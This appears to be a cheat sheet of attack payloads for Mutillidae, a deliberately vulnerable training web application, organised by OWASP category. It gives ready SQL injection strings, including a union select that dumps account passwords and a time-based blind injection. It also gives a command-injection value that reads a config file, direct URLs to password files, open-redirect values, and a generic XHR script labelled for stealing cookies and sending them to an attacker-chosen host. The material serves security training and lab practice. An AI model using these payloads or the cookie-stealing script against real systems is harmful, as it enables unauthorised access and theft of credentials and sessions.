    Page: user-info.php
    Technique: Direct SQL injection
    Field: username

    Value: ' or 1=1 --

    Page: user-info.php
    Technique: Indirect SQL injection
    Field: username
    Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --

    Page: login.php
    Technique: Blind SQL Injection
    Field: username
    Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --
    Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1

    ---------------------------------Failure to Restrict URL Access---------------------------------


    Page: robots.txt
    Technique: Security Misconfiguration, Design Flaw

    Recon: List Files
    Technique: Shoulder surfing

    Recon: List Files
    Technique: Steal Bookmarks

    Recon: List Files
    Technique: Dump client cache

    Recon: List Files
    Page: dns-lookup.php
    Technique: Command Injection
    Field: hostname

    Scanning: View Source Code
    Page: dns-lookup.php
    Technique: Command Injection
    Field: hostname
    Value: && type config.inc (then see source because PHP code doesn't show in browser)

    Gaining Access: View restricted page
    Page: Any (i.e. - http://localhost/mutillidae/config.inc, http://localhost/mutillidae/passwords/accounts.txt)
    Technique: Type in URL

    ------------------------------------------Insufficient Transport Layer Protection------------------------------------------

    Gaining Access: Intercept clear text credentials
    Page: login.php
    Tool: Use any proxy (Paros, Tamper Data) or sniffer (Wireshark, TCPDump, Snort, etc.)

    Fields: Username and Password

    ------------------------------------------Unvalidated redirects and forwards------------------------------------------

    Page: credits.php
    Technique: Phishing
    Tool: Any proxy, netcat, hackbar
    Field: forwardurl
    Value: any URI

    Page: credits.php
    Technique: Horizontal Application Attack, Restricted URL Access, Authorization Bypass
    Tool: Hackbar, anything that can change the URL query parameters
    Field: forwardurl
    Value: http://localhost/xampp

    --------------------------------------------Information Asset Protection - Cache Control--------------------------------------------


    Recon: Grab leaked company information
    Page: index.php, all
    Technique: View local cache
    Tool: Firefox about:cache, Internet Explorer Tools-->Options-->General Tab-->Browser History Settings-->View Files
    Defenses: cache control headers

    --------------------------------------------Information Asset Protection - Framing--------------------------------------------

    Gaining Access: Cross Frame Scripting/Click-jacking
    Page: index.php, all
    Technique: Frame page, use overlay
    Tool (to view defenses): HTTPFox
    Defense: x-frame-options, frame busters

    ----------------------------------------------Information Asset Protection - Leaked Comments----------------------------------------------

    Page: index.php
    Technique: View Source
    Tool: View Source, Sniffer (Wireshark), HTTPFox

    Defense: Use framework comment tags to trap comments on the app server

    ----------------------------------------------Log Injection----------------------------------------------

    Page: show-log.php
    Technique: Figure out what fields are logged, which of those the client controls, and inject those fields with SQL injection, HTML injection, XSS, XSRF, etc.
    Defense: Logs should be output encoded

    --------------------------------------------------------------------------------Generic XHR to steal cookies (prefix and suffix as necessary)--------------------------------------------------------------------------------

    var lXMLHTTP;
    try{
        var lData = ;
        var lHost = "";
        var lAction = "http://" + lHost + "";
        var lMethod = "";
        try {
            lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");
        }catch (e) {
            try {
                lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");
            }catch (e) {
                try {
                    lXMLHTTP = new XMLHttpRequest();
                }catch (e) {
                    alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
                }
            }
        }//end try
        lXMLHTTP.onreadystatechange = function(){
            if(lXMLHTTP.readyState == 4){
                alert("Capture Complete");//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
            }// end if
        }
        lXMLHTTP.open(lMethod, lAction, true);
        ///////////////////////////////
        //UNCOMMENT FOR GET REQUESTS
        ///////////////////////////////
        //NOTE: This is a GET so your URL-action has to contain your data. We clear lData only to avoid error.
        //lData="";
        /////////////////////////////
        ///////////////////////////////
        //UNCOMMENT FOR POST REQUESTS
        ///////////////////////////////
        lXMLHTTP.setRequestHeader("Host", lHost);
        //lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        /////////////////////////////
        lXMLHTTP.send(lData);
    }catch(e){
        alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
    }